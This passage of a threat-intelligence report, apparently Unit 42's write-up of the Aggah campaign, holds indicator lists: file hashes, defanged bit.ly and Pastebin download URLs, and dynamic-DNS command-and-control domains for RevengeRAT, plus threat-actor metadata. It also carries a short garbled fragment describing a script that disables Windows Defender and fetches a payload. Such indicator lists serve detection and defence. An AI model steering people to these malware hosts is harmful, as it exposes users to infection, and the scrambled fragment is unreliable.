a890\r\na5c3c96b655d3115a39875e0303951fef2f2d6119b0af9eaadf57bacfae3f5cb\r\n10d4bd37cd29071186b4ef31341edb79a9ae05c6bc8d26c9850cfeccabb90d1f\r\n89903b38efc7a86da63d547d3d4e3439d64656a030cb289eff4721bc5ada3e13\r\n464f30101630f06013ea65e72b0c043fa1fc83440d9c3367e474d6309d3fe4c9\r\n5e226f1c0729d1fbcf6e074e28009d35e2f6eaa4d4eb0c411892ea56e1299c86\r\nf57fff1b8acdee475b161ec1313452f0fe66077142fc677a63f7914a96890bae\r\na1879f1f3c2bbb1a4cf8af8e54230c3b0b88c29e37902c88d37ec9d7a1138894\r\n3fa2591b208137d68aa87da931d9cc152a62250b7d26755818f362fa5015a99a\r\n87f43fd2f6c9d1439ceb250e3bd045a07d9a8c214cf17dc66a8c22a3846b6437\r\n4e2997adac5ae57ab92512e5b02e9a5ceb588f287a68387420113ed7b3d347d2\r\nd32f1bd358b97f8f1ae2295c7e8969fab1460d9d54c9528dcfbb42c96a74b31b\r\nf69fff5106fc73672569abc62ad85cfa461c237d9222426db20d6565021c110f\r\n5742ebd53b2b495df0c6bff8ddc17d1726cb8e76e269bd8207b07a0a3ee2b813\r\nd2a2373a386392f72372c9a23b42b43fd2652b6dafce6a6d8d44368ccbfdadb6\r\nb9f74a648b0202109d2c53d68a8474d6eabfefba28bf99a53517ece52da483d5\r\n3088fcd46c51e7ace8aee4e9bfb018aa1d0b0a52fbea62e5ef121e4fe637ebfc\r\n54cba5cfb44379f8a4aac2e1d93d7e8e2ba83afe312d2b1a4f9145846efcd413\r\n00a002607b6e7938292e7ae81ca60d58a091c456ea4343210d4bb610b6edee01\r\n4c29279f341f568056fe9e2ff8bfb2fcaf06b065246329ca9652fcd7986b405d\r\n1d1904dad2df5d677342806cbf1b67b9840d1bc9c85c10928896fcfa91661762\r\n5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 13 of 18\n\nb10519bb52656a09aa146305d8b2ec4aa55f3dba43c633d9de23046798a32a2f\r\nb6db8716bedd23042883f31132fa00b4125c659f2799d239f42105367ff42aec\r\n821e6f3faacb4edafa8ddb60f83a7c8e87845a07ad8d1f8362a7c68cd8a48343\r\n1fd98d66d123d4d0c049b4e1053d22335ef9dcec9fdde398d608c7d7d23ed280\r\n5ca968f9e6a97505abe7c732b5ee573f787b11f294ccbf3a96ae7b77ccce004c\r\n26f5e813e34c05cd1e553224e5c8284ced7fa648d55725416232c24e58546e60\r\nef837119fc241e8fde85f36f4635a71f6b87aecf39dc979961be914f48c4ef4c\r\nd7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946\r\n915535fd77ac89a3a86eca6b3a1f1852f69c141050754f059c094c39a9ee4259\r\n0671a2b4ae1a94edca9f65f7d11199d6526cab1fd53911e114ab772900d8a583\r\nea3cab2a0b74e30c0d6812e3ef6fcc9e47ea723c98d39fa1e04d5edf03193ff0\r\nde657d3538e96a8d2c74b7c4f8c6fb2e51d67f12d158abfea2964298a722993c\r\n70657b183854550e77633f85d9e63fbf0b01a21131388228985322880b987b9a\r\nbc8a00fddff73accaff5eb5f3a6ca182a5282502d7af054ca9176d2e98a5116a\r\nc3f36883ebf928c8403e068648299b53b09fecb0f56986980319e83f13dc296c\r\n0e5011ee17c5f9bbcad8df4dc2a971fe56346f8ca7ce4e93d25f3b02086c581c\r\n51147c260c18d3e766006ae4ffa216d4c178c8ee669a83391fab0de98da24b27\r\ne1eb9daa5fb43b9f07e2b75f931a815fd5adf7e3f8d4f885740202af886402da\r\n08883b4d7081d51bb9d9429f856c7c4c95f47a22f38aeb48b7772635d718c7ca\r\n12a7ac8838681a95339e24683c0c8e6410a040a8a8ce5fe72bc175b724cb0aa9\r\nDownload URLs\r\nwww.bitly[.]com/nliasjdASd1\r\nwww.bitly[.]com/nliasjdASd2\r\nwww.bitly[.]com/nliasjdASd3\r\nwww.bitly[.]com/nliasjdASd4\r\nwww.bitly[.]com/nliasjdASd5\r\nwww.bitly[.]com/nliasjdASd6\r\nwww.bitly[.]com/nliasjdASd7\r\nwww.bitly[.]com/nliasjdASd8\r\nwww.bitly[.]com/nliasjdASd9\r\nwww.bitly[.]com/nliasjdASd11\r\nwww.bitly[.]com/nliasjdASd12\r\nwww.bitly[.]com/nliasjdASd13\r\nwww.bitly[.]com/SexoPhone1\r\nwww.bitly[.]com/SexoPhone2\r\nwww.bitly[.]com/SexoPhone4\r\nwww.bitly[.]com/SmexEaldos1\r\nwww.bitly[.]com/SmexEaldos2\r\nwww.bitly[.]com/SmexEaldos3\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 14 of 18\n\nhttp://bitly[.]com/SmexEaldos4\r\nwww.bitly[.]com/SmexEaldos5\r\nwww.bitly[.]com/SmexEaldos6\r\nwww.bitly[.]com/SmexEaldos7\r\nwww.bitly[.]com/SmexEaldos8\r\nwww.bitly[.]com/SmexEaldos9\r\nwww.bitly[.]com/SmexEaldos10\r\nwww.bitly[.]com/XAMSeWaWz\r\nwww.bitly[.]com/CAEanwQA\r\nwww.bitly[.]com/MinPoXAsUKx\r\nwww.bitly[.]com/MinPoXAs\r\nhttp:/bitly[.]com/chutter1\r\nwww.bitly[.]com/doc201901000791\r\nwww.bitly[.]com/doc201901000793\r\nwww.bitly[.]com/ASDAWnZqWas\r\nUnit 42 - Latest Cyber Security Research | Palo Alto Networks\r\nemawattttson.blogspot[.]com\r\nUnit 42 - Latest Cyber Security Research | Palo Alto Networks\r\nUnit 42 - Latest Cyber Security Research | Palo Alto Networks\r\nUnit 42 - Latest Cyber Security Research | Palo Alto Networks\r\nhttps://pastebin[.]com/raw/2LDaeHE1\r\nhttp://pastebin[.]com/raw/YYZq1XR0\r\nhttps://pastebin[.]com/raw/tb5gHu2G\r\nhttp://pastebin[.]com/raw/0c9cC2iM\r\nhttp://pastebin[.]com/raw/sgawvit9\r\nThe following indicators were identified associated with RevengeRAT, however, may not be exclusive to RevengeRAT\r\nfrankmana.duckdns[.]org\r\nworkfine11.duckdns[.]org\r\noldmandnsch.duckdns[.]org\r\noldmandnsch.duckdns[.]org\r\nblackhagga.duckdns[.]org\r\nskyrocket1.duckdns[.]org\r\nskyrocket1.duckdns[.]org\r\nkronoz.duckdns[.]org\r\noldmandnsch.duckdns[.]org\r\nkronozzz2.duckdns[.]org\r\nlulla.duckdns[.]org\r\ndecent.myvnc[.]com\r\ndecent5.myvnc[.]com\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 15 of 18\n\njayztools1.ddns[.]net\r\njayztools2.ddns[.]net\r\njayztools3.ddns[.]net\r\ntotallol.duckdns[.]org\r\ntotallol1.duckdns[.]org\r\ntotallol2.duckdns[.]org\r\ntotallol3.duckdns[.]org\r\ndecent2.myvnc[.]com\r\ndecent3.myvnc[.]com\r\ndecent1.myvnc[.]com\r\ndecent4.myvnc[.]com\r\njordanchen736.sytes[.]net\r\njordanchen7361.sytes[.]net\r\njordanchen7362.sytes[.]net\r\njordanchen7363.sytes[.]net\r\nlalacious1.serveftp[.]com\r\nlalacious2.serveftp[.]com\r\nlalacious3.serveftp[.]com\r\nlalacious4.serveftp[.]com\r\nmastermana1.serveirc[.]com\r\nmastermana2.serveirc[.]com\r\nmastermana3.serveirc[.]com\r\nmastermana4.serveirc[.]com\r\nmastermana5.serveirc[.]com\r\nlullikhao.ddns[.]net\r\nlullikhao1.ddns[.]net\r\nlullikhao2.ddns[.]net\r\nbullol.duckdns[.]org\r\ncocomo.ddns[.]net\r\nhaggasinger2.ddns[.]net\r\nhaggasinger.ddns[.]net\r\nhaggasinger1.ddns[.]net\r\nloramer1.ddnsking[.]com\r\neasykill.servebeer[.]com\r\neasykill3.servebeer[.]com\r\neasykill2.servepics[.]com\r\neasykill1.servepics[.]com\r\neasykill3.servepics[.]com\r\nhelloweenhagga.ddns[.]net\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 16 of 18\n\nhelloweenhagga3.ddns[.]net\r\nhelloweenhagga4.ddns[.]net\r\nhelloweenhagga2.ddns[.]net\r\nrevengerx211.sytes[.]net\r\nrevengerx212.sytes[.]net\r\nrevengerx213.sytes[.]net\r\nrevengerx214.sytes[.]net\r\nrevengerx215.sytes[.]net\r\nrevengerx216.sytes[.]net\r\nrevengerx217.sytes[.]net\r\nrevengerx218.sytes[.]net\r\nrevengerx219.sytes[.]net\r\nrevengerx210.sytes[.]net\r\noffice365update.duckdns[.]org\r\nsysten32.ddns[.]net\r\nbhenchood.ddns[.]net\r\nemmanuelstevo.ddns[.]net\r\nzinderhola1.ddns[.]net\r\nzinderhola.ddns[.]net\r\nmyownlogs.duckdns[.]org\r\ncocomo1.ddns[.]net\r\ncocomo10.serveblog[.]net\r\ncocomo2.ddns[.]net\r\ncocomo2.serveblog[.]net\r\ncocomo3.serveblog[.]net\r\ncocomo4.serveblog[.]net\r\ncocomo5.serveblog[.]net\r\ncocomo6.serveblog[.]net\r\ncocomo7.serveblog[.]net\r\ncocomo8.serveblog[.]net\r\ncocomo9.serveblog[.]net\r\nmrcode.hopto[.]org\r\nmrcode1.hopto[.]org\r\nmrcode2.hopto[.]org\r\npussi2442.ddns[.]net\r\nUnit 42 has identified additional indicators associated with the Aggah campaign. These indicators include:\r\nDelivery documents:\r\n63684ec73be78b2676470484602caf7090e73ed589618cedb017a09b15cc4abc\r\n89d925222af65a01b69a65ae4bba878c0c64cdb9ac06d54d9da6bf1911c5a41d\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 17 of 18\n\nPastebin URLs:\r\nhttps://pastebin[.]com/raw/5EH8DHwd\r\nhttps://pastebin[.]com/raw/TaCG9fsP\r\nhttp://pastebin[.]com/raw/5J5dtrzL\r\nBit.ly URLs:\r\nhttps://bitly[.]com/ChutasdhikhasdAS[number 1-20]\r\nBlogspot:\r\nUnit 42 - Latest Cyber Security Research | Palo Alto Networks\r\nRevengeRAT:\r\n0f266a7c9ff37313e6d8b823e3407271e635d565cde3e0829a15fffa65f776d8\r\nC2 Domains:\r\nmajorsss.duckdns[.]org\r\ncycbra.duckdns[.]org\r\nSource: https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nhttps://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/\r\nPage 18 of 18\n\nhamper Windows Defender script hosted on the and kill Office Blogspot blog, of which applications. The tb5gHu2G downloads and executes script also attempts the payload from to run the same the “2LDaeHE1” VBScript as the Pastebin page\nshown in Figure 6. Figure 10 shows the Pastebin page hosting the tb5gHu2G script.\n Page 6 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA", "Malpedia" ], "references": [ "https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/" ], "report_names": [ "aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "b0d34dd6-ee90-483b-bb6c-441332274160", "created_at": "2022-10-25T16:07:23.296754Z", "updated_at": "2026-04-10T02:00:04.526403Z", "deleted_at": null, "main_name": "Aggah", "aliases": [ "Operation Red Deer", "Operation Roma225" ], "source_name": "ETDA:Aggah", "tools": [ "AgenTesla", "Agent Tesla", "AgentTesla", "Aggah", "Atros2.CKPN", "Bladabindi", "Jorik", "Nancrat", "NanoCore", "NanoCore RAT", "Negasteal", "Origin Logger", "Revenge RAT", "RevengeRAT", "Revetrat", "Warzone", "Warzone RAT", "ZPAQ", "Zurten", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "18278778-fa63-4a9a-8988-4d266b8c5c1a", "created_at": "2023-01-06T13:46:38.769816Z", "updated_at": "2026-04-10T02:00:03.094179Z", "deleted_at": null, "main_name": "The Gorgon Group", "aliases": [ "Gorgon Group", "Subaat", "ATK92", "G0078", "Pasty Gemini" ], "source_name": "MISPGALAXY:The Gorgon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "97fdaf9f-cae1-4ccc-abe2-76e5cbc0febd", "created_at": "2022-10-25T15:50:23.296989Z", "updated_at": "2026-04-10T02:00:05.347085Z", "deleted_at": null, "main_name": "Gorgon Group", "aliases": [ "Gorgon Group" ], "source_name": "MITRE:Gorgon Group", "tools": [ "NanoCore", "QuasarRAT", "Remcos", "njRAT" ], "source_id": "MITRE", "reports": null }, { "id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2", "created_at": "2023-06-20T02:02:10.254614Z", "updated_at": "2026-04-10T02:00:03.365336Z", "deleted_at": null, "main_name": "Hagga", "aliases": [ "TH-157", "Aggah" ], "source_name": "MISPGALAXY:Hagga", "tools": [ "Agent Tesla" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "6c4e4b91-1f98-49e2-90e6-435cea8d3d53", "created_at": "2022-10-25T16:07:23.693797Z", "updated_at": "2026-04-10T02:00:04.711987Z", "deleted_at": null, "main_name": "Gorgon Group", "aliases": [ "ATK 92", "G0078", "Pasty Draco", "Subaat", "TAG-CR5" ], "source_name": "ETDA:Gorgon Group", "tools": [ "AgenTesla", "Agent Tesla", "AgentTesla", "Atros2.CKPN", "Bladabindi", "CinaRAT", "Crimson RAT", "ForeIT", "Jorik", "LOLBAS", "LOLBins", "Living off the Land", "Loki", "Loki.Rat", "LokiBot", "LokiPWS", "MSIL", "MSIL/Crimson", "Nancrat", "NanoCore", "NanoCore RAT", "Negasteal", "NetWeird", "NetWire", "NetWire RAT", "NetWire RC", "NetWired RC", "Origin Logger", "Quasar RAT", "QuasarRAT", "Recam", "Remcos", "RemcosRAT", "Remvio", "Revenge RAT", "RevengeRAT", "Revetrat", "SEEDOOR", "Scarimson", "Socmer", "Yggdrasil", "ZPAQ", "Zurten", "njRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434118, "ts_updated_at": 1775792156, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d983112a3f954a98d504b21b89afdc1b40f17703.pdf", "text": "https://archive.orkl.eu/d983112a3f954a98d504b21b89afdc1b40f17703.txt", "img": "https://archive.orkl.eu/d983112a3f954a98d504b21b89afdc1b40f17703.jpg" } }